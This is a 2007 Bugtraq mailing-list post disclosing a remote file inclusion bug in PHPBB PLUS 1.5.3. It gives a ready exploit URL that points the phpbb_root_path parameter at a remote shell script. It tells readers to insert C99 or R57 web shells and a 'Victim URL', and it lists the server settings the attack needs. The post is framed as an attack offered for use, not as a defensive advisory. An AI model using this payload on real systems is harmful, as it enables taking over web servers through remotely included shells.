PHPBBPLUS 1.5.3 RFI BUG

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: PHPBBPLUS 1.5.3 RFI BUG
From: Mehrad1989@xxxxxxxxx
Date: 19 Sep 2007 19:07:48 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Hi Milw0rm .
My Name ( AUTHOR ) Is  = Mehrad Ansari Targhi
My E-Mail : mehrad1989@xxxxxxxxx
My Yahoo Messenger ID : mehrad_1989
Please Instert My Name And E-Mail And My Yahoo Messenger In The Exploit .
I Found a Bug In PHPBB PLUS 1.53 .
This Is A RFI Bug .
This Bug Is In : [ PHPBBPLUS INSTALLED 
]/language/lang_german/lang_main_album.php
Exploit : 
http://[PHPPLUS]/language/lang_german/lang_main_album.php?phpbb_root_path=[ 
http://shell.txt]?a=
Just Replace http://Shell.txt With Your Script Source Address Like C99 Or R57 
Or ... And Replace [PHPPLUS] With Your Victim URL And Remove [] From The 
Exploit .
Register Global Must Be On , On The Server .
Remote File Inc. Must Be On , On The Server .
German Language Must Be Installed .

Prev by Date: WBR3404TX Broadband Router XSS
Next by Date: [USN-515-1] t1lib vulnerability
Previous by thread: WBR3404TX Broadband Router XSS
Next by thread: [USN-515-1] t1lib vulnerability
Index(es):
- Date
- Thread